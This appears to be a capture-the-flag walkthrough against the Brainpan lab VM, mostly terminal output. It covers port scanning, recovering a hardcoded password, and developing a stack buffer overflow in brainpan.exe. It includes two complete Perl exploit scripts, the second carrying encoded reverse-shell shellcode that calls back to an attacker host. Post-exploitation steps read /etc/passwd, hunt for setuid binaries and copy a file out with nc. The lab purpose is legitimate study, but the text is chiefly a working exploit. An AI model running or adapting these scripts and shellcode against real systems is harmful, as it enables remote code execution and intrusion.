root@kali:~# netdiscover
192.168.56.104
root@kali:~# unicornscan -mT 192.168.56.104
TCP open ndmp[10000]
root@kali:~# nmap -sS -A 192.168.56.104 -pT:10000
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
root@kali:~# nmap -sT 192.168.56.104 -pT:1-65535
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
root@kali:~# nmap -sS -A 192.168.56.104 -pT:9999
SF-Port9999-TCP:V=6.40%I=7%D=1/16%Time=52D7DAB2%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");
root@kali:~# nc 192.168.56.104 9999
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>>
http://192.168.56.104:10000/
root@kali:~# nikto -host 192.168.56.104 -port 10000
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.104
+ Target Hostname: 192.168.56.104
+ Target Port: 10000
+ Start Time: 2014-01-16 14:21:40 (GMT1)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ 6544 items checked: 25 error(s) and 4 item(s) reported on remote host
+ End Time: 2014-01-16 14:21:52 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
http://192.168.56.104:10000/bin/
brainpan.exe (downloaded)
root@kali:~# hd brainpan.exe | more
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 |MZ..............|
This is a Windows PE executable (the file starts with the "MZ" signature), yet it is served from a Linux-looking host — keep that in mind when choosing a payload later.
root@kali:~# wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
root@kali:~# netstat -nl | grep 9999
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN
root@kali:~# nc 127.0.0.1 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>>
root@kali:~# strings brainpan.exe
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>>
ACCESS DENIED
ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter
__getmainargs
__p__environ
__p__fmode
__set_app_type
_assert
_cexit
_iob
_onexit
_setmode
abort
atexit
free
malloc
memset
printf
signal
strcmp
strcpy
strlen
WSACleanup
WSAGetLastError
WSAStartup
accept
bind
closesocket
htons
listen
recv
send
socket
KERNEL32.dll
msvcrt.dll
WS2_32.DLL
root@kali:~# nc 127.0.0.1 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>> shitstorm
ACCESS GRANTED
root@kali:~# nc 192.168.56.104 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>> shitstorm
ACCESS GRANTED
The password is shitstorm.
This is probably a buffer overflow challenge: the binary imports strcpy and logs how many bytes it copied to a buffer (see the strings output above), so the password is most likely copied into a fixed-size stack buffer without a length check.
I send a big string as the password...
[get_reply] s =
[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(■B]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x61616161 at address 0x61616161 (thread 0009), starting debugger...
Unhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).
Register dump:
CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
EIP:61616161 ESP:0042f810 EBP:61616161 EFLAGS:00010206( R- -- I - -P- )
EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810: 61616161 61616161 61616161 61616161
0x0042f820: 61616161 61616161 61616161 61616161
0x0042f830: 61616161 61616161 61616161 61616161
0x0042f840: 61616161 61616161 61616161 61616161
0x0042f850: 61616161 61616161 61616161 61616161
0x0042f860: 61616161 61616161 61616161 61616161
Hex 0x61 is 'a': EIP, EBP and the stack around ESP are all filled with our input, so the return address is under our control and whatever sits at ESP is our data too.
root@kali:~# hexeditor overflow.txt
root@kali:~# nc 127.0.0.1 9999 < overflow.txt
...
bbbbabcdabcdefghijklmnopqrstuvwxyz{|}~
[get_reply] copied 540 bytes to buffer
EIP:69686766 ESP:0042f810 EBP:65646362 EFLAGS:00010206( R- -- I - -P- )
EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810: 6d6c6b6a 71706f6e 0a747372 00000000
0x0042f820: 00000000 00000000 00000000 00000000
EIP : 69686766 (ihgf) EBP: 65646362 (edcb)
Stack: mlkj qpon utsr yxwv
}|{z
The plan was to point EIP at ESP: replace the four bytes that became 0x69686766 ("ihgf") with 0x0042f810.
That doesn't work because the address contains a 0x00 byte: the input is copied with strcpy (see the imports in the strings output), which stops at the first NUL, so the rest of the payload is never copied. The return address must not contain 0x00 (the encoder runs below also exclude 0x0a and 0x0d).
root@kali:~# wine OLLYDBG.EXE ../brainpan.exe
Searched brainpan.exe in OllyDbg for a JMP ESP instruction: found one at 0x311712f3. The address contains no 0x00/0x0a/0x0d bytes and lies in the binary's own image, so it is a usable return address — note it is specific to this build of brainpan.exe and assumes the module is loaded at its usual base.
root@kali:~# hexeditor overflow.txt
[get_reply] copied 550 bytes to buffer
wine: Unhandled page fault on read access to 0xffffffff at address 0x42f88d (thread 002d), starting debugger...
Unhandled exception: page fault on read access to 0xffffffff in 32-bit code (0x0042f88d).
Register dump:
CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
EIP:0042f88d ESP:0042f810 EBP:65646362 EFLAGS:00010206( R- -- I - -P- )
EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810: 90909090 71909090 75747372 79787776
0x0042f820: 7d7c7b7a 00000a7e 00000000 00000000
0x0042f830: 00000000 00000000 00000000 00000010
0x0042f840: 00000000 00000000 00000000 00000000
0x0042f850: 5da40002 0100007f 00000000 00000000
0x0042f860: 0f270002 00000000 00000000 00000000
root@kali:~# pico buf_ov.pl
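#!/usr/bin/perl
# buf_ov.pl -- control-of-EIP proof of concept for brainpan.exe (TCP 9999).
#
# Usage: buf_ov.pl IP_ADDRESS PORT
#
# Payload layout (3000 bytes total):
#   524 x "A"        filler up to the saved return address (offset found with
#                    the pattern runs above)
#   0x311712F3 (LE)  JMP ESP inside brainpan.exe; contains no 0x00 byte, so
#                    strcpy() copies it intact
#   "C" padding      what ESP points at after the JMP ESP; no shellcode yet,
#                    this script only proves the redirect
#
# NOTE(review): the gadget address is specific to this build of brainpan.exe
# and to it being loaded at its usual base; re-check it if the binary changes.
use strict;
use warnings;
use IO::Socket;

# Guard @ARGV before comparing, so a missing PORT dies cleanly instead of
# warning about an undefined value.
if (@ARGV < 2 || $ARGV[1] eq '') {
    die("Usage: $0 IP_ADDRESS PORT\n\n");
}
my ($target, $port) = @ARGV;

my $baddata = "A" x 524;                        # 524 "A" characters reach EIP
$baddata .= pack('V', 0x311712F3);              # JMP ESP, little-endian
$baddata .= "C" x (3000 - length($baddata));    # pad to 3000 bytes with "C"

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $target,
    PeerPort => $port,
) or die "Cannot connect to $target:$port";

# Read the banner/prompt first so the server is blocked in recv() when the
# overflow arrives; then send and close.
my $sd = '';
$socket->recv($sd, 1024);
print "$sd";
$socket->send($baddata);
close($socket);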
root@kali:~# perl buf_ov.pl 127.0.0.1 9999
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on write access to 0x00000073 at address 0x42f9eb (thread 0009), starting debugger...
Unhandled exception: page fault on write access to 0x00000073 in 32-bit code (0x0042f9eb).
Register dump:
CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
EIP:0042f9eb ESP:0042f810 EBP:41414141 EFLAGS:00010202( R- -- I - - - )
EAX:ffffffff EBX:7b8a61cc ECX:00000073 EDX:00429501
ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810: 43434343 43434343 43434343 43434343
0x0042f820: 43434343 43434343 43434343 43434343
0x0042f830: 43434343 43434343 43434343 43434343
0x0042f840: 43434343 43434343 43434343 43434343
0x0042f850: 43434343 43434343 43434343 43434343
0x0042f860: 43434343 43434343 43434343 43434343
root@kali:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 C | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
...
root@kali:~# pico buf_ov.pl
root@kali:~# perl buf_ov.pl 127.0.0.1 9999
[get_reply] copied 1003 bytes to buffer
err:seh:setup_exception_record stack overflow 1648 bytes in thread 0009 eip 7bc411a8 esp 00230cc0 stack 0x230000-0x231000-0x430000
root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
[*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)
my $buf =
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";
root@kali:~# pico buf_ov2.pl
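#!/usr/bin/perl
# buf_ov2.pl -- reverse-shell exploit for brainpan.exe (TCP 9999).
#
# Usage: buf_ov2.pl IP_ADDRESS PORT
#
# Payload layout:
#   524 x "A"        filler up to the saved return address
#   0x311712F3 (LE)  JMP ESP inside brainpan.exe (no 0x00/0x0a/0x0d bytes)
#   16 x NOP         landing zone at ESP before the decoder stub
#   shellcode        linux/x86/shell_reverse_tcp, LHOST=192.168.56.101
#                    LPORT=1234, x86/shikata_ga_nai, bad chars \x00\x0a\x0d
#
# A Linux payload is used even though the target is a Win32 PE: the service
# runs under Wine on a Linux host (see the uname/netstat output in the shell
# below), so Linux syscalls work inside the process, and the Windows staged
# payload tried earlier only produced a Wine stack-overflow error.
#
# NOTE(review): the shellcode calls back to 192.168.56.101:1234 -- regenerate
# it for your own listener. The gadget address is specific to this build of
# brainpan.exe.
use strict;
use warnings;
use IO::Socket;

if (@ARGV < 2 || $ARGV[1] eq '') {
    die("Usage: $0 IP_ADDRESS PORT\n\n");
}
my ($target, $port) = @ARGV;

my $nop = "\x90";                       # x86 NOP

my $baddata = "A" x 524;                # 524 "A" characters reach EIP
$baddata .= pack('V', 0x311712F3);      # JMP ESP, little-endian
$baddata .= $nop x 16;                  # NOP sled: gives the GetPC/decoder
                                        # stub slack at ESP (assumed -- TODO
                                        # confirm it is needed for this stub)
$baddata .=
    "\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
    "\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
    "\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
    "\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
    "\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
    "\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
    "\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $target,
    PeerPort => $port,
) or die "Cannot connect to $target:$port";

# Consume the banner/prompt, deliver the overflow, then close; the shell
# arrives on the separate listener (nc -l -p 1234).
my $sd = '';
$socket->recv($sd, 1024);
print "$sd";
$socket->send($baddata);
close($socket);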
root@kali:~# nc -l -p 1234
root@kali:~# perl buf_ov2.pl 192.168.56.104 9999
...
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
pwd
/home/puck
ls
checksrv.sh
web
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
netstat -nlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 995/brainpan.exe
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 914/python
udp 0 0 0.0.0.0:19733 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp6 0 0 :::2659 :::* -
Active UNIX domain sockets (only servers)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] SEQPACKET LISTENING 6957 - /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 6769 - @/com/ubuntu/upstart
unix 2 [ ACC ] STREAM LISTENING 7573 - /var/run/samba/winbindd_privileged/pipe
unix 2 [ ACC ] STREAM LISTENING 7572 - /tmp/.winbindd/pipe
unix 2 [ ACC ] STREAM LISTENING 9488 999/wineserver socket
unix 2 [ ACC ] STREAM LISTENING 7418 - /var/run/dbus/system_bus_socket
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:reynard
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:reynard
floppy:x:25:
tape:x:26:
sudo:x:27:reynard
audio:x:29:
dip:x:30:reynard
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:reynard
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
messagebus:x:104:
fuse:x:105:
mlocate:x:106:
ssh:x:107:
reynard:x:1000:
lpadmin:x:108:reynard
sambashare:x:109:reynard
anansi:x:1001:
puck:x:1002:
winbindd_priv:x:110:
cat checksrv.sh
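#!/bin/bash
# checksrv.sh -- watchdog for the two Brainpan services, found in /home/puck.
# Restarts brainpan.exe (under wine, TCP 9999) and the Python SimpleHTTPServer
# (TCP 10000) whenever their port is no longer listening.
#
# NOTE(review): how this script is scheduled is not visible here. If it is run
# by root (e.g. from a cron job) and is writable by puck, it is a direct
# privilege-escalation path -- check its owner/mode and the crontabs.

# run brainpan.exe if it stops
# lsof exits 1 when nothing listens on the port (0 when something does).
lsof -i:9999 >/dev/null
if [[ $? -eq 1 ]]; then
  # The original `ps aux | grep ... | grep -v grep` yielded whole ps lines, so
  # `kill -9 $pid` never received a PID; pgrep returns only PIDs.
  pids=$(pgrep -f brainpan.exe)
  if [[ -n "$pids" ]]; then
    # shellcheck disable=SC2086 -- pids is a whitespace-separated PID list
    kill -9 $pids
    killall wineserver
    killall winedevice.exe
  fi
  /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000 >/dev/null
if [[ $? -eq 1 ]]; then
  pids=$(pgrep -f SimpleHTTPServer)
  if [[ -n "$pids" ]]; then
    # shellcheck disable=SC2086 -- pids is a whitespace-separated PID list
    kill -9 $pids
  fi
  # Serve /home/puck/web. Backgrounded like brainpan.exe above: the original
  # ran it in the foreground, so a restart of the web server blocked the
  # watchdog (and therefore its next check of port 9999) for ever.
  (cd /home/puck/web && /usr/bin/python -m SimpleHTTPServer 10000) &
fi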
find / -type f -perm -04000 -ls
525499 64 -rwsr-xr-x 1 root root 63632 Sep 6 2012 /bin/umount
525495 32 -rwsr-xr-x 1 root root 31124 Sep 6 2012 /bin/su
525498 88 -rwsr-xr-x 1 root root 88768 Sep 6 2012 /bin/mount
530420 32 -rwsr-xr-x 1 root root 30112 Jun 11 2012 /bin/fusermount
525651 40 -rwsr-xr-x 1 root root 39124 Oct 2 2012 /bin/ping6
525650 36 -rwsr-xr-x 1 root root 34780 Oct 2 2012 /bin/ping
...
658003 116 -rwsr-xr-x 2 root root 115140 Feb 27 2013 /usr/bin/sudo
672442 60 -rwsr-xr-x 1 root root 60344 Jun 18 2012 /usr/bin/mtr
658477 32 -rwsr-xr-x 1 root root 30936 Sep 6 2012 /usr/bin/newgrp
658673 32 -rwsr-xr-x 1 root root 31756 Sep 6 2012 /usr/bin/chsh
658003 116 -rwsr-xr-x 2 root root 115140 Feb 27 2013 /usr/bin/sudoedit
658676 40 -rwsr-xr-x 1 root root 40300 Sep 6 2012 /usr/bin/chfn
672094 16 -rwsr-xr-x 1 root root 14020 Oct 2 2012 /usr/bin/traceroute6.iputils
671718 48 -rwsr-sr-x 1 daemon daemon 46576 Jun 11 2012 /usr/bin/at
675550 16 -rwsr-xr-x 1 root lpadmin 13672 Dec 4 2012 /usr/bin/lppasswd
658671 44 -rwsr-xr-x 1 root root 41292 Sep 6 2012 /usr/bin/passwd
658667 60 -rwsr-xr-x 1 root root 57964 Sep 6 2012 /usr/bin/gpasswd
672668 20 -rwsr-sr-x 1 libuuid libuuid 17996 Sep 6 2012 /usr/sbin/uuidd
672521 296 -rwsr-xr-- 1 root dip 301944 Sep 26 2012 /usr/sbin/pppd
656771 12 -rwsr-xr-x 1 anansi anansi 8761 Mar 4 2013 /usr/local/bin/validate
925433 312 -rwsr-xr-- 1 root messagebus 317564 Oct 3 2012 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
925584 244 -rwsr-xr-x 1 root root 248064 Sep 6 2012 /usr/lib/openssh/ssh-keysign
788361 8 -rwsr-xr-x 1 root root 5452 Jun 25 2012 /usr/lib/eject/dmcrypt-get-device
657855 12 -rwsr-xr-x 1 root root 9740 Oct 3 2012 /usr/lib/pt_chown
find / -perm -2 -ls
...
/usr/local/bin/validate
usage /usr/local/bin/validate <input>
/usr/local/bin/validate aaaa
validating input...passed.
/usr/local/bin/validate
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASegmentation fault
root@kali:~# nc -l -p 12345 > validate
nc 192.168.56.101 12345 < /usr/local/bin/validate
root@kali:~# ls -al validate
-rw-r--r-- 1 root root 8761 jan 17 11:47 validate
root@kali:~# ./validate
bash: ./validate: Engedély megtagadva (Permission denied)
root@kali:~# chmod 744 validate
root@kali:~# ./validate
usage ./validate <input>
I'm not ready yet to solve this task... (validate is setuid anansi — see the find output above — and segfaults on a long argument, so it looks like the next overflow target, but I haven't worked it out yet.)